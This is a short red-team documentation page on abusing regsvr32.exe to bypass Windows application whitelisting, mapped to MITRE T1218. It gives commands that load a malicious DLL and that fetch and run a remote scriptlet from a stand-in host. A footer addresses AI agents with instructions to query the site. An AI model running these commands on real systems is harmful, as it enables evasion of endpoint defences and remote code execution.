# RegSrv32 ## Theory Regsvr32 is a Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry. Besides its intended use, regsvr32.exe binary can also be used to execute arbitrary binaries and bypass the Windows Application Whitelisting. Application Whitelisting is a Microsoft endpoint security feature that prevents malicious and unauthorized programs from executing in real-time. Application whitelisting is rule-based, where it specifies a list of approved applications or executable files that are allowed to be present and executed on an operating system. ## Practice {% tabs %} {% tab title="Regsvr32.exe" %} ```bash #Execute dll c:\Windows\System32\regsvr32.exe c:\Users\pwn\Downloads\malicious.dll #Or c:\Windows\System32\regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\malicious.dll ``` With the .sct file as: ```bash #http://example.com/file.sct ``` The MITRE ATT\&CK framework refers to this technique as [Signed Binary Proxy Execution (T1218)](https://attack.mitre.org/techniques/T1218/) {% endtab %} {% endtabs %} ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/redteam/weapon/code-execution/regsrv32.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.